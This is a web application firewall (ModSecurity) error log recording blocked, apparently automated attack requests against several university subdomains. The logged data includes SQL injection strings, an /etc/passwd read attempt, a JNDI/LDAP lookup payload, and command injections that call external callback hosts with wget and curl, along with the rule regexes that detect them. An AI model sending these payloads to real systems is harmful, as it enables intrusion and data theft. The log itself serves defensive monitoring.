[Tue Aug 29 11:31:37.338948 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAP@M04AAAAZ"]
[Tue Aug 29 11:31:37.345055 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQkBWcAAAAC"]
[Tue Aug 29 11:31:37.367362 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAPah1QAAAAL"]
[Tue Aug 29 11:31:37.371020 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qcCo-f0AAAQJWvMAAAAr"]
[Tue Aug 29 11:31:37.376414 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAP@M08AAAAZ"]
[Tue Aug 29 11:31:37.401078 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAQMrt8AAAAu"]
[Tue Aug 29 11:31:37.404274 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAQEGLkAAAAm"]
[Tue Aug 29 11:31:37.407607 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQmR3wAAAAH"]
[Tue Aug 29 11:31:37.429892 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlg81ejqg5zttxgc.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qcCo-f0AAAN@5HUAAAAO"]
[Tue Aug 29 11:31:37.442391 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAP@M1EAAAAZ"]
[Tue Aug 29 11:31:37.458645 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAN@5HYAAAAO"]
[Tue Aug 29 11:31:37.458715 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAANsATsAAAAD"]
[Tue Aug 29 11:31:38.300198 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgmdz664e65qu1w.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAANsAT0AAAAD"]
[Tue Aug 29 11:31:38.303139 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgqy4g8ckhu4ssm.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAP@M1MAAAAZ"]
[Tue Aug 29 11:31:38.306727 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgx6qdz5kzdb574.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQMruMAAAAu"]
[Tue Aug 29 11:31:38.310723 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgw19wt7tdesqsa.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQEGLsAAAAm"]
[Tue Aug 29 11:31:38.327292 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgf5zfjdac5n1sy.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQlGRYAAAAF"]
[Tue Aug 29 11:31:38.455511 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qsCo-f0AAAQMruQAAAAu"]
[Tue Aug 29 11:31:38.499479 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAPiBjwAAAAB"]
[Tue Aug 29 11:31:38.500904 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgsqexn3n76qws3.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQlGRkAAAAF"]
[Tue Aug 29 11:31:38.502238 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgk6iathxotzr1m.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAP@M1YAAAAZ"]
[Tue Aug 29 11:31:38.512853 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQJWvoAAAAr"]
[Tue Aug 29 11:31:38.515651 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQEGL0AAAAm"]
[Tue Aug 29 11:31:38.608137 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAN@5HwAAAAO"]
[Tue Aug 29 11:31:38.611201 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAP8G0MAAAAV"]
[Tue Aug 29 11:31:38.668183 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgm1odj9hw9uekp.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQgqUkAAAAA"]
[Tue Aug 29 11:31:38.708161 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlg6npnc6nu184to.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAPMmJcAAAAY"]
[Tue Aug 29 11:31:38.714317 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgws5js7idaz366.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAPDn7MAAAAP"]
[Tue Aug 29 11:31:39.335823 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10q8Co-f0AAAP@M1kAAAAZ"]
